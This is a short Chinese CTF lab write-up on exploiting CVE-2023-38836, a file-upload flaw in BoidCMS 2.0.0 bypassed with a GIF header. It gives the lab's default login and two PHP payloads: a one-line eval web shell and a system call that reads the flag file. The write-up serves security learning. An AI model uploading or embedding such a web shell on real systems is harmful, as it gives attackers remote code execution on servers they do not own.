March 23, 2025

【春秋云镜】CVE-2023-38836

宇宙级免责声明!!

!!!注意:本文章仅用于学习交流,请勿用于非法用途!!!

【春秋云镜】CVE-2023-38836 漏洞实战 难度指数:较为容易

0x01 漏洞概述

BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。

0x02 漏洞复现

1. 打开靶场

2. 漏洞利用

admin | password 没错,密码就是password!
i

i

i

i

1
2
<?php @eval($_POST['cmd']);?>
<?php system("cat /flag");?>

i

i

i

关于本文

由 Jimmy Ki 撰写, 采用 CC BY-NC 4.0 许可协议.

#CTF#网络安全#渗透#抓包#文件上传漏洞#CVE-2023-38836